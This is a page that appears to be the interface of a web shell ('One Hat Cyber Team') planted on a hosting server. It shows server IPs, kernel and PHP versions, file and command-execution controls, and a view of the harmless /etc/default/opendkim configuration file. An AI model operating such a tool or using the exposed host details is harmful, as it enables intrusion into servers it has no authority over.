⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
etc
/
default
/
View File Name :
opendkim
# NOTE: This is a legacy configuration file. It is not used by the opendkim # systemd service. Please use the corresponding configuration parameters in # /etc/opendkim.conf instead. # # Previously, one would edit the default settings here, and then execute # /lib/opendkim/opendkim.service.generate to generate systemd override files at # /etc/systemd/system/opendkim.service.d/override.conf and # /etc/tmpfiles.d/opendkim.conf. While this is still possible, it is now # recommended to adjust the settings directly in /etc/opendkim.conf. # #DAEMON_OPTS="" # Change to /var/spool/postfix/run/opendkim to use a Unix socket with # postfix in a chroot: #RUNDIR=/var/spool/postfix/run/opendkim RUNDIR=/run/opendkim # # Uncomment to specify an alternate socket # Note that setting this will override any Socket value in opendkim.conf # default: SOCKET=inet:8891@127.0.0.1 # listen on all interfaces on port 54321: #SOCKET=inet:54321 # listen on loopback on port 12345: #SOCKET=inet:12345@localhost # listen on 192.0.2.1 on port 12345: #SOCKET=inet:12345@192.0.2.1 USER=opendkim GROUP=opendkim PIDFILE=$RUNDIR/$NAME.pid EXTRAAFTER="" DAEMON_OPTS="-b sv"